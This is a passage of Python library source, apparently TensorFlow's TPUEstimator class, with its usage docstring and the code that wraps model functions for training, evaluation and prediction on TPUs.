max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
